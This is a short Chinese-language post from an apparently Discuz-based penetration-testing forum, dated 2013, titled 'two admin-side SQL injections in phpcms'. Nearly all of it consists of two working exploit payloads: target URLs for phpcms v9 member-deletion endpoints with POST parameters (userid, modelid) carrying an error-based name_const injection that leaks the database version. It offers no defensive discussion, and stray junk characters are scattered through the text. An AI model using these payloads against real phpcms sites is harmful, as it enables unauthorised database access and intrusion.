中国网络渗透测试联盟

标题: phpcms两处后台的SQL注入 [打印本页]

作者: admin    时间: 2013-7-27 18:33
标题: phpcms两处后台的SQL注入
(一):
+ F1 U" ~' K" w4 c

http://www.0day5.com/phpcmsv9/index.php?m=member&c=member&a=delete&pc_hash=GlyB7G&id

post

userid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)


* X: j  O, n3 \6 Z9 A
7 A) A4 K- @3 c3 F' `7 O0 `* n# s" q- u1 H9 R5 n" U7 t0 G. z

(二):

http://www.0day5.com/phpcmsv9/index.php?m=member&c=member_model&a=delete&pc_hash=GlyB7G

post

modelid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2